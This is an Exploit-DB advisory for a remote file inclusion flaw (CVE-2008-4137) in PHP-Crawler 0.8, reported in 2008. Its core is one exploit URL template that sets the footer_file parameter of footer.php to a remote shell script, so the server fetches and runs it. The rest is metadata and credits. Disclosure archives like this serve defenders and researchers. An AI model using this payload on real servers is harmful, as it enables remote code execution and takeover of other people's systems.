PHP Crawler 0.8 footer Remote File Inclusion Vulnerability

2008-09-17T00:00:00
ID EDB-ID:6475
Type exploitdb
Reporter Piker
Modified 2008-09-17T00:00:00

Description

PHP Crawler 0.8 (footer) Remote File Inclusion Vulnerability. CVE-2008-4137. Webapps exploit for php platform

                                        
                                            ################## Piker #######################################
#
#
#    PHP-Crawler v0.8 Remote File Inclusion Vulnerability
#
#
#    Affected software: PHP-Crawler 0.8
#    Vendor: http://sourceforge.net/projects/php-crawler/
#    Risk: Critical
#
################################################################
#
#    http://[target]/[path]/footer.php?footer_file=[SHELL]
#
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]
#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# milw0rm.com [2008-09-17]